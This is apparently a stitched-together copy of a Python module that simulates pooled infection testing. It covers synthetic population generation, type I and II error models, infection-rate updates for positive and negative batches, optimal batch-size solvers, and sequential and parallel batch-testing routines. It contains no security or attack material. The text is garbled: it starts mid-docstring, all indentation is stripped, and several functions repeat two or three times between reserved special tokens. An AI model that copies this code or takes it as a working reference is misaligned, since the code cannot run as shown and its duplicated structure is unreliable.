            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
        batch_limit (int): the upper limit of the batch size
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
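# Illustrative usage sketch (assumes numpy as np plus the elided helpers above).
# A toy population of six subjects, ids 0-5, with only subject 3 infected:
#
#   toy = np.array([[0, 0], [1, 0], [2, 0], [3, 1], [4, 0], [5, 0]])
#   pred, total_tests, ind_tests = seq_test(toy, stop_rule=2, p=0.05, batch_size=3,
#                                           typeII_error=0.05, typeI_error=0.01)
#   # pred[:, 0] holds the subject ids and pred[:, 1] the test decisions;
#   # total_tests counts batch tests plus the individual retests (ind_tests).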
<|reserved_special_token_0|>
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
        is the condition, where 1 stands for infection and 0 stands for no infection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
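# Usage sketch: generate replicated synthetic populations for Monte Carlo
# comparison of the testing strategies (size and rate below are illustrative):
#
#   populations = [data_gen(size=10000, p=0.01) for _ in range(50)]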
<|reserved_special_token_0|>
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
    This function provides the fixed-batch-size sequential testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
        repeat (int): the number of potential individual testing for the positive batches
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
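# Unlike seq_test, which re-optimises the batch size at every split through
# one_batch_test_int_solver, fixed_batch_seq_test keeps the batch size constant and
# reshuffles the subjects of each split (np.random.permutation) before re-batching.
# Illustrative call (parameter values are only an example):
#
#   pred, total_tests, ind_tests = fixed_batch_seq_test(
#       population, stop_rule=2, p=0.01, batch_size=32,
#       typeII_error=0.05, typeI_error=0.01, repeat=2)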
def name_fun(n):
"""
    Input: the stopping rule n.
    Output: all finishing nodes, the nodes finishing with n negatives, and the
        nodes finishing with n positives, each encoded as a '+'/'-' string.
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
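# Worked example: with stopping rule n = 2 the walk over batch outcomes stops as
# soon as two results of the same sign have accumulated, so
#
#   name_fun(2) == (['++', '--', '+-+', '+--', '-++', '-+-'],
#                   ['--', '+--', '-+-'],    # paths that stop on a second negative
#                   ['++', '+-+', '-++'])    # paths that stop on a second positive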
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
    Type I error, and the number of repetitions, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
        stop_rule (int): the number of positive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
        batch_limit (int): the upper limit of the batch size
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@jit(parallel=True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat=1,
seq=True):
"""
A function gives the test results to a subject array given the probability of
    type II error, the probability of Type I error, and the number of repetitions,
and setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i, 1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, consum
else:
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat / 2 else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * repeat
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
<|reserved_special_token_0|>
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
    A function gives a list of subjects on the negative batch(es),
    a list of subjects on the positive batch(es) and the test-kit
consumption given the probability of type II error, the
probability of Type I error.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
        pos_batch (Numpy Array): an array of subjects on the positive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array) / batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in temp_batch[:, 1]:
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
    neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])
    pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])
return neg_batch, pos_batch, test_consum
def helpfunction(subject_array, p, batch_size, typeII_error, typeI_error,
    batch_limit=32):
"""
The helpfunction is a handy function to give the list of subjects on the
    negative batch(es), the list of subjects on the positive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
subject_array (Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
        temp1 (Numpy Array): an array of subjects on the positive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error,
typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error,
typeI_error)
n0 = one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
    if len(subject_array) == 0:
        # empty input: return empty splits and zero test consumption
        return np.array([]), np.array([]), 0, p0, p1, n0, n1
temp0, temp1, temp_con = neg_pos_batch_split(subject_array, batch_size,
typeII_error, typeI_error)
return temp0, temp1, temp_con, p0, p1, n0, n1
def seq_test(subject_array, stop_rule, p, batch_size, typeII_error,
typeI_error, repeat=1, prob_threshold=1, seq=True, batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
    Type I error, and the number of repetitions, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
        stop_rule (int): the number of positive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
        batch_limit (int): the upper limit of the batch size
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
<|reserved_special_token_0|>
def specificity_score(y_true, y_pred):
"""
A function provides specificty given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true=y_true, y_pred=y_pred).ravel()
return tn / (tn + fp)
@jit(parallel=True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
        is the condition, where 1 stands for infection and 0 stands for no infection
"""
random_table = np.random.binomial(size=size, p=p, n=1)
test_array = np.zeros((size, 2), dtype=int)
for i in range(size):
test_array[i, 0] = i
test_array[i, 1] = random_table[i]
return test_array
<|reserved_special_token_0|>
def parallel_batch_testing(subject_array, batch_size, typeII_error,
typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array) / batch_size) * parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(
subject_array) / batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in temp_batch[:, 1]:
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
elif random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
    neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])
    pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch,
typeII_error, typeI_error, repeat=ind_repeat, seq=seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, batch_consum + individual_con, individual_con
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
    This function provides the fixed-batch-size sequential testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
        repeat (int): the number of potential individual testing for the positive batches
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
def name_fun(n):
"""
    Input: the stopping rule n.
    Output: all finishing nodes, the nodes finishing with n negatives, and the
        nodes finishing with n positives, each encoded as a '+'/'-' string.
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
    Type I error, and the number of repetitions, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
        stop_rule (int): the number of positive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
        batch_limit (int): the upper limit of the batch size
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@jit(parallel=True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat=1,
seq=True):
"""
A function gives the test results to a subject array given the probability of
    type II error, the probability of Type I error, and the number of repetitions,
and setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
            condition (1 stands for infection and 0 stands for no infection)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
            when the test result is positive or the number of repetitions is used up.
            False stands for simultaneous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i, 1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, consum
else:
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat)
)
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat / 2 else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * repeat
@njit(parallel=True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
test_result = np.zeros(subject_array.shape, dtype=int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i, :]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i, :]) < typeI_error else 0
test_result[i, 0] = subject_array[i, 0]
test_result[i, 1] = temp
return test_result, len(subject_array) * num, len(subject_array) * num
def infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1 - p
r = typeII_error * (1 - q ** batch_size) / ((1 - typeI_error) * q **
batch_size + typeII_error * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1 - p
r = (1 - typeII_error) * (1 - q ** batch_size) / (typeI_error * q **
batch_size + (1 - typeII_error) * (1 - q ** batch_size))
return p * r / (1 - q ** batch_size)
def one_batch_test_solver(prevalence_rate, typeII_error, typeI_error,
n_initial_guess=2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
q = 1 - prevalence_rate
func = lambda n: n * q ** (n / 2) - (-(1 - typeII_error - typeI_error) *
np.log(q)) ** (-1 / 2)
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
